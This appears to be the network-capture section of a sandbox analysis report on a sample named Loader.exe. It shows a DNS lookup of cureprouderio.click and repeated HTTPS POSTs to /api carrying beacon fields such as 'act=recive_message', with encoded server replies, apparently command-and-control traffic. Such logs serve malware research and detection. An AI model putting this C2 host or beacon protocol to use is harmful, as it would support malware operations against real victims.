                                                                                                Dec 28, 2024 04:14:02.315577984 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.315591097 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.315601110 CET49709443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.315604925 CET44349709172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.504439116 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.504487991 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:02.504551888 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.504806995 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:02.504823923 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:03.769797087 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:03.769915104 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:03.771051884 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:03.771070957 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:03.771281004 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:03.772304058 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:03.772404909 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:03.772434950 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:04.647408009 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:04.647496939 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:04.647569895 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:04.647813082 CET49710443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:04.647842884 CET44349710172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:04.766608000 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:04.766649008 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:04.766729116 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:04.767060041 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:04.767071009 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.071960926 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.072098017 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:06.073406935 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:06.073419094 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.073631048 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.074748993 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:06.074866056 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:06.074882030 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.075053930 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:06.115328074 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.929920912 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.930020094 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:06.930099010 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:06.930389881 CET49711443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:06.930409908 CET44349711172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:07.124808073 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:07.124856949 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:07.124941111 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:07.125298023 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:07.125310898 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:08.439095974 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:08.439165115 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:08.443197012 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:08.443213940 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:08.443470955 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:08.445097923 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:08.445281029 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:08.445317030 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:08.445385933 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:08.445394993 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:09.442164898 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:09.442265987 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:09.442321062 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:09.442444086 CET49712443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:09.442459106 CET44349712172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:09.939091921 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:09.939131975 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:09.939197063 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:09.939510107 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:09.939523935 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:11.204317093 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:11.204432964 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:11.214853048 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:11.214869022 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:11.215166092 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:11.221393108 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:11.221524954 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:11.221534967 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:11.969228983 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:11.969363928 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:11.969419003 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:11.969563961 CET49713443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:11.969598055 CET44349713172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:12.600239992 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:12.600276947 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:12.600374937 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:12.600769997 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:12.600785017 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.829252005 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.829356909 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.830688953 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.830698013 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.831022024 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.832185984 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.833105087 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.833144903 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.833256006 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.833292961 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.833405018 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.833477020 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.833595991 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.833616018 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.833759069 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.833789110 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.833935976 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.833965063 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.875333071 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.875560999 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.875600100 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.919332981 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.919491053 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.919533014 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.919543028 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.963368893 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:13.963583946 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:13.963618994 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:14.011332035 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:14.011554956 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:14.059325933 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:14.073050976 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:14.073191881 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:14.073246002 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:14.073271990 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:16.198983908 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:16.199106932 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:16.199165106 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:16.199306011 CET49714443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:16.199325085 CET44349714172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:16.208563089 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:16.208621979 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:16.208722115 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:16.209112883 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:16.209130049 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:17.467389107 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:17.467660904 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:17.468879938 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:17.468894005 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:17.469224930 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:17.477405071 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:17.477459908 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:17.477497101 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:18.223155975 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:18.223278046 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:18.223423004 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:18.223499060 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:18.223520041 CET44349718172.67.132.7192.168.2.5
                                                                                                Dec 28, 2024 04:14:18.223557949 CET49718443192.168.2.5172.67.132.7
                                                                                                Dec 28, 2024 04:14:18.223566055 CET44349718172.67.132.7192.168.2.5
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 28, 2024 04:13:57.649383068 CET6019653192.168.2.51.1.1.1
                                                                                                Dec 28, 2024 04:13:57.963618040 CET53601961.1.1.1192.168.2.5
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Dec 28, 2024 04:13:57.649383068 CET192.168.2.51.1.1.10xe89cStandard query (0)cureprouderio.clickA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Dec 28, 2024 04:13:57.963618040 CET1.1.1.1192.168.2.50xe89cNo error (0)cureprouderio.click172.67.132.7A (IP address)IN (0x0001)false
                                                                                                Dec 28, 2024 04:13:57.963618040 CET1.1.1.1192.168.2.50xe89cNo error (0)cureprouderio.click104.21.4.114A (IP address)IN (0x0001)false
                                                                                                • cureprouderio.click
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549708172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:13:59 UTC266OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:13:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                Data Ascii: act=life
                                                                                                2024-12-28 03:14:00 UTC1129INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:13:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=gsfd1cue1a692i01uiufjme058; expires=Tue, 22 Apr 2025 21:00:38 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlPh4lCCDkhrx6AlVJjtF3Lswyj8q19IDwTs7JMuRCahfAvwEr1vT%2FEH9z%2BJxVE6j8JyFkpDrhSM6A%2BqZ9GWvd17osZy%2F6gnd33iHSI4NSxvW0GICPfJz%2BhcPzXqwiKhiyL9PVQp"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e60ab282d4338-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1768&rtt_var=672&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=910&delivery_rate=1618625&cwnd=193&unsent_bytes=0&cid=971e1c952123fe84&ts=777&x=0"
                                                                                                2024-12-28 03:14:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                Data Ascii: 2ok
                                                                                                2024-12-28 03:14:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549709172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:14:01 UTC267OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 54
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:14:01 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 26 6a 3d
                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--hubcpvkeaidz&j=
                                                                                                2024-12-28 03:14:02 UTC1125INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:14:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=uqh3s46ccq8iom28es3au75nsm; expires=Tue, 22 Apr 2025 21:00:40 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1PhqbrAgNs8VYjW9PNIJTygMOCp7Uz2EMC%2FbBwJG9F3E8261EAPWexXXrbQXZGdIMRRJ4kwBSzwlYw5KtqQtXNPcq9KMgE%2FEuDs%2B5BMTSW2bsdilTOcfDzJCYaqDCu84dkzB2f2u"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e60b7da674267-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1736&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=957&delivery_rate=1630374&cwnd=234&unsent_bytes=0&cid=428c96dc31e5a756&ts=815&x=0"
                                                                                                2024-12-28 03:14:02 UTC244INData Raw: 34 36 61 0d 0a 45 72 74 6c 45 6a 51 52 42 6d 44 67 6f 39 69 75 47 7a 30 6d 4d 64 4c 6d 38 62 46 46 49 6f 62 2f 61 42 47 50 62 59 75 45 41 38 4a 70 6d 52 4d 77 44 69 55 71 51 70 50 47 2b 70 52 76 54 31 4e 55 2f 73 53 51 31 57 63 59 34 4a 34 45 59 75 70 42 71 66 4a 75 34 43 6a 64 42 48 35 48 64 43 70 43 68 64 76 36 6c 45 42 47 42 46 53 38 78 4d 75 54 49 45 6a 6b 6e 67 52 7a 37 67 62 6b 39 47 2b 68 65 74 63 43 65 6c 46 79 59 67 47 4d 7a 72 33 4c 66 6c 78 4d 58 37 75 4c 6d 64 78 6e 44 71 53 61 45 6a 4f 31 54 38 62 68 64 36 4e 66 32 68 5a 35 46 6d 77 71 47 38 4c 47 74 6f 77 68 48 30 64 55 73 49 71 58 31 53 35 4b 37 70 63 4d 63 75 73 48 2b 2b 31 6c 71 6e 72 5a 41 58 74 62 65 33 59 4d 68 73 6d 32 7a 58 52 63 42 42 33 77 67 34 75
                                                                                                Data Ascii: 46aErtlEjQRBmDgo9iuGz0mMdLm8bFFIob/aBGPbYuEA8JpmRMwDiUqQpPG+pRvT1NU/sSQ1WcY4J4EYupBqfJu4CjdBH5HdCpChdv6lEBGBFS8xMuTIEjkngRz7gbk9G+hetcCelFyYgGMzr3LflxMX7uLmdxnDqSaEjO1T8bhd6Nf2hZ5FmwqG8LGtowhH0dUsIqX1S5K7pcMcusH++1lqnrZAXtbe3YMhsm2zXRcBB3wg4u
                                                                                                2024-12-28 03:14:02 UTC893INData Raw: 54 66 77 43 33 72 77 6c 69 2f 42 72 6b 39 6d 66 67 62 35 63 65 4d 46 46 2f 4a 46 72 43 79 62 62 43 66 46 78 4c 56 4c 47 45 67 64 77 6e 51 2b 79 56 44 6e 6e 69 41 4f 62 6f 61 36 64 34 30 41 42 2f 55 58 74 69 44 59 47 42 39 49 78 2b 52 77 51 4c 38 4b 53 44 30 43 52 55 36 59 78 4b 62 4b 4d 57 71 65 46 74 34 43 69 5a 41 58 35 58 66 6d 51 51 69 73 71 78 79 57 74 55 54 56 36 39 68 4a 37 5a 4b 45 50 6b 6d 67 42 35 34 67 58 74 36 32 79 6d 63 4e 6c 48 50 68 5a 30 66 45 4c 61 67 5a 6e 4a 61 56 68 49 52 66 4b 2b 30 38 78 70 57 61 53 61 42 6a 4f 31 54 2b 48 6a 59 71 4e 37 31 67 52 34 58 57 46 6b 45 49 54 4d 76 39 35 2f 57 6b 70 5a 73 35 61 5a 33 53 46 44 37 5a 59 44 64 75 6f 4c 71 61 67 68 70 32 69 5a 58 7a 42 33 66 6d 38 4f 69 4e 61 36 6a 47 59 52 58 52 4f 33 69 4e
                                                                                                Data Ascii: TfwC3rwli/Brk9mfgb5ceMFF/JFrCybbCfFxLVLGEgdwnQ+yVDnniAOboa6d40AB/UXtiDYGB9Ix+RwQL8KSD0CRU6YxKbKMWqeFt4CiZAX5XfmQQisqxyWtUTV69hJ7ZKEPkmgB54gXt62ymcNlHPhZ0fELagZnJaVhIRfK+08xpWaSaBjO1T+HjYqN71gR4XWFkEITMv95/WkpZs5aZ3SFD7ZYDduoLqaghp2iZXzB3fm8OiNa6jGYRXRO3iN
                                                                                                2024-12-28 03:14:02 UTC1369INData Raw: 34 34 62 32 0d 0a 43 2b 69 70 54 46 5a 31 2b 71 68 45 70 30 34 55 2b 78 70 6d 36 76 66 39 45 48 63 56 4a 2b 59 41 4f 50 7a 62 50 50 64 56 4e 4d 58 72 79 41 6e 4e 73 76 51 2b 79 50 42 48 33 72 43 65 6e 6a 49 65 34 77 33 68 38 77 44 6a 4e 41 44 4a 58 56 73 59 35 4d 58 45 70 64 74 35 4c 54 7a 47 6c 5a 70 4a 6f 47 4d 37 56 50 35 2b 74 71 72 48 66 51 42 6e 4e 57 65 57 6f 4e 69 4d 6d 79 7a 48 52 65 54 31 75 32 69 5a 6a 63 4b 45 66 73 6e 67 5a 32 34 41 79 70 71 43 47 6e 61 4a 6c 66 4d 48 4e 39 5a 78 4f 54 67 34 2f 50 64 31 46 44 52 66 43 62 33 63 70 6e 52 2b 6a 64 55 6a 50 6e 43 4f 37 69 62 4b 70 7a 33 51 4e 39 57 58 70 74 43 35 44 4c 74 73 4a 72 55 6b 35 57 76 6f 69 57 33 43 64 42 35 5a 4d 41 65 4b 31 42 71 65 46 35 34 43 69 5a 4b 48 31 47 59 57 34 4a 6b 34 4f
                                                                                                Data Ascii: 44b2C+ipTFZ1+qhEp04U+xpm6vf9EHcVJ+YAOPzbPPdVNMXryAnNsvQ+yPBH3rCenjIe4w3h8wDjNADJXVsY5MXEpdt5LTzGlZpJoGM7VP5+tqrHfQBnNWeWoNiMmyzHReT1u2iZjcKEfsngZ24AypqCGnaJlfMHN9ZxOTg4/Pd1FDRfCb3cpnR+jdUjPnCO7ibKpz3QN9WXptC5DLtsJrUk5WvoiW3CdB5ZMAeK1BqeF54CiZKH1GYW4Jk4O
                                                                                                2024-12-28 03:14:02 UTC1369INData Raw: 77 51 4c 38 4b 75 51 78 53 30 41 2b 39 4d 54 4d 2b 6f 44 71 62 34 68 71 6e 7a 64 42 48 78 66 66 32 6b 44 68 73 61 33 79 48 6c 5a 51 6c 61 78 6a 35 76 66 4b 45 72 6f 6d 51 5a 36 36 77 50 71 35 57 66 67 50 70 6b 41 61 42 59 72 4a 43 4f 50 79 72 62 4d 65 6b 35 44 45 2f 37 45 6e 64 55 6e 41 4c 79 4c 47 6d 54 71 45 4b 66 2f 49 61 64 38 6d 56 38 77 58 47 46 68 44 49 62 4c 76 38 68 31 56 55 52 57 6f 6f 79 56 31 43 74 49 34 5a 49 4d 64 75 41 49 34 75 56 7a 73 6e 50 64 43 58 77 57 50 53 51 46 6d 6f 48 69 6a 46 78 49 52 30 4f 32 68 39 50 4d 61 56 6d 6b 6d 67 59 7a 74 55 2f 70 36 47 32 72 64 39 49 4d 64 46 4a 7a 61 51 6d 4d 7a 37 50 41 63 56 4e 44 51 62 32 42 6d 39 6b 75 52 65 69 51 43 57 48 75 44 71 6d 6f 49 61 64 6f 6d 56 38 77 63 55 42 54 49 63 4c 65 39 4e 55 35
                                                                                                Data Ascii: wQL8KuQxS0A+9MTM+oDqb4hqnzdBHxff2kDhsa3yHlZQlaxj5vfKEromQZ66wPq5WfgPpkAaBYrJCOPyrbMek5DE/7EndUnALyLGmTqEKf/Iad8mV8wXGFhDIbLv8h1VURWooyV1CtI4ZIMduAI4uVzsnPdCXwWPSQFmoHijFxIR0O2h9PMaVmkmgYztU/p6G2rd9IMdFJzaQmMz7PAcVNDQb2Bm9kuReiQCWHuDqmoIadomV8wcUBTIcLe9NU5
                                                                                                2024-12-28 03:14:02 UTC1369INData Raw: 6a 45 76 39 41 6f 53 36 53 43 52 47 71 74 43 4f 57 6d 4f 65 42 33 30 51 39 2b 56 58 56 76 44 6f 37 41 73 38 70 38 56 30 4e 63 74 34 32 55 30 79 46 53 34 35 41 44 63 2b 59 47 34 2b 4a 67 71 7a 43 58 52 33 64 4f 4d 7a 78 43 73 4d 61 73 33 48 6f 66 57 78 32 70 78 4a 54 66 5a 78 69 6b 6b 42 68 79 36 42 33 74 36 57 71 79 65 39 38 48 64 55 52 30 61 41 69 4e 77 72 4c 42 65 6c 64 57 55 37 32 45 67 63 45 68 53 2b 72 64 52 44 50 71 46 36 6d 2b 49 5a 46 6e 30 6b 64 76 47 47 6f 6b 42 59 36 42 34 6f 78 36 56 55 6c 64 6f 6f 43 56 32 43 52 4f 37 4a 67 43 64 2b 63 43 35 75 31 72 71 58 6a 5a 43 48 56 65 65 47 49 4d 67 38 65 32 77 54 6b 52 42 46 53 6f 78 4d 75 54 41 46 72 70 6d 78 31 69 32 41 6a 70 74 79 47 2f 50 73 42 48 64 31 6f 7a 50 45 4b 50 7a 62 44 42 66 46 74 4d 56
                                                                                                Data Ascii: jEv9AoS6SCRGqtCOWmOeB30Q9+VXVvDo7As8p8V0Nct42U0yFS45ADc+YG4+JgqzCXR3dOMzxCsMas3HofWx2pxJTfZxikkBhy6B3t6Wqye98HdUR0aAiNwrLBeldWU72EgcEhS+rdRDPqF6m+IZFn0kdvGGokBY6B4ox6VUldooCV2CRO7JgCd+cC5u1rqXjZCHVeeGIMg8e2wTkRBFSoxMuTAFrpmx1i2AjptyG/PsBHd1ozPEKPzbDBfFtMV
                                                                                                2024-12-28 03:14:02 UTC1369INData Raw: 4b 5a 30 66 6f 33 56 49 7a 34 77 4c 76 35 32 43 6f 65 4e 6b 42 65 6c 4a 77 62 51 47 46 79 4c 7a 48 65 6c 56 4c 56 4c 61 41 6b 39 67 67 54 75 4b 59 41 58 71 74 51 61 6e 68 65 65 41 6f 6d 53 46 54 52 47 46 57 44 49 48 61 2b 74 4d 33 52 67 52 55 76 4d 54 4c 6b 79 78 49 36 34 38 50 65 75 55 4c 34 4f 5a 6c 71 6e 33 65 42 33 56 62 64 6d 41 4d 68 73 61 36 77 48 5a 59 54 46 79 30 68 4a 79 54 61 51 44 6a 68 55 6f 72 72 53 2f 69 38 45 43 75 65 38 74 48 62 78 68 71 4a 41 57 4f 67 65 4b 4d 64 31 5a 46 57 37 36 49 6d 39 63 31 51 4f 2b 55 42 58 4c 69 44 2b 72 6e 61 36 68 69 33 77 64 37 58 6e 52 73 42 6f 7a 54 75 38 4d 35 45 51 52 55 71 4d 54 4c 6b 78 5a 57 34 35 6f 46 4d 63 51 49 38 75 64 72 6f 33 76 56 52 32 38 59 61 69 51 46 6a 6f 48 69 6a 48 52 54 53 56 65 69 69 4a
                                                                                                Data Ascii: KZ0fo3VIz4wLv52CoeNkBelJwbQGFyLzHelVLVLaAk9ggTuKYAXqtQanheeAomSFTRGFWDIHa+tM3RgRUvMTLkyxI648PeuUL4OZlqn3eB3VbdmAMhsa6wHZYTFy0hJyTaQDjhUorrS/i8ECue8tHbxhqJAWOgeKMd1ZFW76Im9c1QO+UBXLiD+rna6hi3wd7XnRsBozTu8M5EQRUqMTLkxZW45oFMcQI8udro3vVR28YaiQFjoHijHRTSVeiiJ
